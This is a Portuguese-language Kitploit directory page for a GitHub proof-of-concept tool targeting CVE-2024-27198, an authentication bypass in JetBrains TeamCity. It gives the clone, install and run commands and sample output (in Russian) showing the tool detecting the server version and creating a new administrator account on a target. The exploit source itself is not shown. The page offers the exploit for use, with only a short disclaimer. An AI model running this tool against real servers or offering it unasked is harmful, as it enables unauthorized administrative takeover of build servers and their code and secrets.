Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-27198 — é uma ferramenta de PoC que visa uma vulnerabilidade no servidor TeamCity (CVE-2024-27198) | Kitploit
Ferramentas/GitHubGitHub/geniuszly/cve-2024-27198
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

é uma ferramenta de PoC que visa uma vulnerabilidade no servidor TeamCity (CVE-2024-27198)

Ver Repositório
32há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PT

GenTeamCityExploit é uma ferramenta PoC que tem como alvo uma vulnerabilidade no servidor TeamCity (CVE-2024-27198). Permite descobrir a versão do TeamCity e criar um novo usuário administrador ao explorar uma falha de bypass de autenticação.

Funcionalidades

  • Extrai a versão do servidor TeamCity.
  • Verifica a presença de uma vulnerabilidade conhecida (CVE-2024-27198).
  • Cria um novo usuário administrador se o servidor estiver vulnerável.

Pré-requisitos

  • Python 3.6+: Certifique-se de ter o Python instalado.
  • Bibliotecas: Instale as bibliotecas necessárias usando:
    root@kitploit:~
    pip install requests urllib3
    

Uso

  1. Clone o repositório.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Navegue até o diretório.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Execute o script com os parâmetros necessários.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Parâmetros:
    • -t, --target: A URL do servidor TeamCity alvo.
    • -u, --username: O nome de usuário para o novo administrador.
    • -p, --password: A senha para o novo administrador.

Exemplo

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Exemplo de saída

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

Caso o servidor não esteja vulnerável ou a versão não seja encontrada:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

Se houver um erro ao conectar ao servidor:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Aviso Legal

Esta ferramenta é destinada apenas para fins educacionais e não deve ser usada em nenhum sistema sem permissão explícita do proprietário. O acesso não autorizado a sistemas de computador é ilegal.

Baixar ferramenta